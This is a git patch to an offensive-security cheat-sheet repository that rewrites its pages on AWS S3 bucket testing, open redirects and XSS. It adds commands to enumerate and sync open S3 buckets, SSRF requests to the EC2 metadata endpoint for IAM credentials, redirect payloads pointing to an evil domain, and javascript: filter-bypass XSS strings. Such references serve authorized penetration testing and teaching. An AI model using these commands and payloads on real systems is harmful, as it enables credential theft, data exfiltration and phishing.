From 8b39647de6886a79fbb44aa091700d9c0359ffb1 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sat, 29 Dec 2018 13:05:29 +0100 Subject: [PATCH] AWS S3 and Open redirect rewritten --- AWS Amazon Bucket S3/README.md | 81 +++++++++++++++++++++------------- Open redirect/README.md | 40 ++++++++++++++++- XSS injection/README.md | 8 ++++ 3 files changed, 97 insertions(+), 32 deletions(-) diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 34625a063c..17a1a5e5d5 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -1,9 +1,47 @@ # Amazon Bucket S3 AWS +## Summary + +- [Tools](#tools) +- [AWS Configuration](#aws-configuration) +- [Open Bucket](#open-bucket) +- [Basic tests](#basic-tests) + - [Listing files](#listing-files) + - [Move a file into the bucket](move-a-file-into-the-bucket) + - [Download every things](#download-every-things) + - [Check bucket disk size](#check-bucket-disk-size) +- [AWS - Extract Backup](#aws---extract-backup) +- [Bucket juicy data](#bucket-juicy-data) + ## Tools - [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu) - +- [Bucket Finder - Search for readable buckets and list all the files in them](https://digi.ninja/) + ```powershell + wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 + ./bucket_finder.rb my_words + ./bucket_finder.rb --region ie my_words + US Standard = http://s3.amazonaws.com + Ireland = http://s3-eu-west-1.amazonaws.com + Northern California = http://s3-us-west-1.amazonaws.com + Singapore = http://s3-ap-southeast-1.amazonaws.com + Tokyo = http://s3-ap-northeast-1.amazonaws.com + + ./bucket_finder.rb --download --region ie my_words + ./bucket_finder.rb --log-file bucket.out my_words + ``` +- [Boto3 - Amazon Web Services (AWS) SDK for Python](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) + ```python + import boto3 + # Create an S3 client + s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1') + + try: + result = s3.list_buckets() + print(result) + except Exception as e: + print(e + ``` ## AWS Configuration @@ -61,7 +99,9 @@ http://example.com/resources/id%C0 eg: http://redacted/avatar/123%C0 ``` -## Basic test - Listing the files +## Basic tests + +### Listing files ```bash aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here @@ -80,7 +120,7 @@ Non-authoritative answer: 11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com. ``` -## Move a file into the bucket +### Move a file into the bucket ```bash aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read @@ -95,13 +135,15 @@ aws s3 mv test.txt s3://hackerone.files SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt" ``` -## Download every things (in an open bucket) +### Download every things ```powershell aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2 ``` -## Check bucket disk size (authenticated) use, --no-sign for un-authenticated +### Check bucket disk size + +Use `--no-sign` for un-authenticated check. ```powershell aws s3 ls s3:// --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}' @@ -128,7 +170,7 @@ sudo file -s /dev/xvda1 sudo mount /dev/xvda1 /mnt ``` -## Bucket informations +## Bucket juicy data Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting : @@ -141,35 +183,12 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ -## Bucket Finder - -A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files. -```powershell -wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 -./bucket_finder.rb my_words -./bucket_finder.rb --region ie my_words - US Standard = http://s3.amazonaws.com - Ireland = http://s3-eu-west-1.amazonaws.com - Northern California = http://s3-us-west-1.amazonaws.com - Singapore = http://s3-ap-southeast-1.amazonaws.com - Tokyo = http://s3-ap-northeast-1.amazonaws.com - -./bucket_finder.rb --download --region ie my_words -./bucket_finder.rb --log-file bucket.out my_words -``` - -Use a custom wordlist for the bucket finder, can be created with - -```powershell -List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media. -List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart. -``` ## References -* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets -* https://digi.ninja/projects/bucket_finder.php +* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets) * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/) * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) +* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/) diff --git a/Open redirect/README.md b/Open redirect/README.md index 36300046ae..80556da662 100644 --- a/Open redirect/README.md +++ b/Open redirect/README.md @@ -2,6 +2,43 @@ > Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. +## Summary + +- [Exploitation](#exploitation) +- [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx) +- [Fuzzing](#fuzzing) +- [Filter Bypass](#filter-bypass) +- [Common injection parameters](#common-injection-parameters) +- [References](#references) + +## Exploitation + +Let’s say there’s a `well known` website - https://famous-website.tld/. And let's assume that there's a link like : + +```powershell +https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account +``` +After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL. +What happens if we change the `famous-website.tld/account` to `evil-website.tld`? + +```powerhshell +https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account +``` + +By visiting this url, if we get redirected to `evil-website.tld` after the signup, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials. + + +## HTTP Redirection Status Code - 3xx + +- [300 Multiple Choices](https://httpstatuses.com/300) +- [301 Moved Permanently](https://httpstatuses.com/301) +- [302 Found](https://httpstatuses.com/302) +- [303 See Other](https://httpstatuses.com/303) +- [304 Not Modified](https://httpstatuses.com/304) +- [305 Use Proxy](https://httpstatuses.com/305) +- [307 Temporary Redirect](https://httpstatuses.com/307) +- [308 Permanent Redirect](https://httpstatuses.com/308) + ## Fuzzing Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case @@ -12,7 +49,7 @@ To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your t WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt ``` -## Exploitation +## Filter Bypass Using a whitelisted domain or keyword @@ -131,3 +168,4 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) +* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/) \ No newline at end of file diff --git a/XSS injection/README.md b/XSS injection/README.md index be82a3c094..781975e03e 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -564,6 +564,14 @@ content['alert'](6) [12].forEach(alert); ``` +Bypass using an alternate way to execute an alert - [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) +```javascript +prompt`${document.domain}` +document.location='java\tscript:alert(1)' +document.location='java\rscript:alert(1)' +document.location='java\tscript:alert(1)' +``` + Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464) ```javascript